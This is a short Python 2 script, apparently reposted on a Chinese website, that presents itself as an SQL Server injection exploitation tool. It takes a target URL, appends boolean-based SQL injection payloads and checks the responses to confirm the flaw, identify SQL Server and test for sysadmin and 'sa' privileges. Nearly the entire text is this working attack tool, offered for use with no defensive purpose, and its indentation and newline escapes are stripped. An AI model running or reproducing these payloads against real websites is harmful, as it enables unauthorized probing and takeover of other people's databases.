# Code by zhaoxiaobu Email: little.bu@hotmail.com
#-*- coding: UTF-8 -*-
from sys import exit
from urllib import urlopen
from string import join,strip
from re import search
def is_sqlable():
sql1="%20and%201=2"
sql2="%20and%201=1"
urlfile1=urlopen(url+sql1)
urlfile2=urlopen(url+sql2)
htmlcodes1=urlfile1.read()
htmlcodes2=urlfile2.read()
if not search(judge,htmlcodes1) and search(judge,htmlcodes2):
print "[信息]恭喜!這個URL是有注入漏洞的!n"
print "[信息]現在判斷數據庫是否是SQL Server,請耐心等候....."
is_SQLServer()
else:
print "[錯誤]你確定這個URL能用?換個別的試試吧!n"
def is_SQLServer():
sql = "%20and%20exists%20(select%20*%20from%20sysobjects)"
urlfile=urlopen(url+sql)
htmlcodes=urlfile.read()
if not search(judge,htmlcodes):
print "[錯誤]數據庫好像不是SQL Server的!n"
else:
print "[信息]確認是SQL Server數據庫!n"
print "[信息]開始檢測當前數據庫用戶權限,請耐心等待......"
is_sysadmin()
def is_sysadmin():
sql = "%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))"
urlfile = urlopen(url+sql)
htmlcodes = urlfile.read()
if not search(judge,htmlcodes):
print "[錯誤]當前數據庫用戶不具有sysadmin權限!n"
else:
print "[信息]當前數據庫用戶具有sysadmin權限!n"
print "[信息]檢測當前用戶是不是SA,請耐心等待......"
is_sa()
def is_sa():
sql = "%20and%20'sa'=(select%20System_user)";
urlfile = urlopen(url+sql)
htmlcodes = urlfile.read()
if not search(judge,htmlcodes):
print "[錯誤]當前數據庫用戶不是SA!n"
else:
print "[信息]當前數據庫用戶是SA!n"
print "n########################################################################n"
print " ^o^SQL Server注入利用工具^o^ "
print " Email: little.bu@hotmail.comn"
print "========================================================================";
url = raw_input('[信息]請輸入一個可能有注入漏洞的鏈接!nURL:')
if url == '':
print "[錯誤]提供的URL必須具有 '.asp?xxx=' 這樣的格式"
exit(1)
judge = raw_input("[信息]請提供一個判斷字符串.n判斷字符串:")
if judge == '':
print "[錯誤]判斷字符串不能為空!"
exit(1)
is_sqlable()聲明:本網頁內容旨在傳播知識,若有侵權等問題請及時與本網聯系,我們將在第一時間刪除處理。TEL:177 7030 7066 E-MAIL:11247931@qq.com
Copyright ? 2019-2025 51dongshi.com 版權所有
違法及侵權請聯系:TEL:177 7030 7066 E-MAIL:11247931@qq.com 本站由北京市萬商天勤律師事務所王興未律師提供法律服務
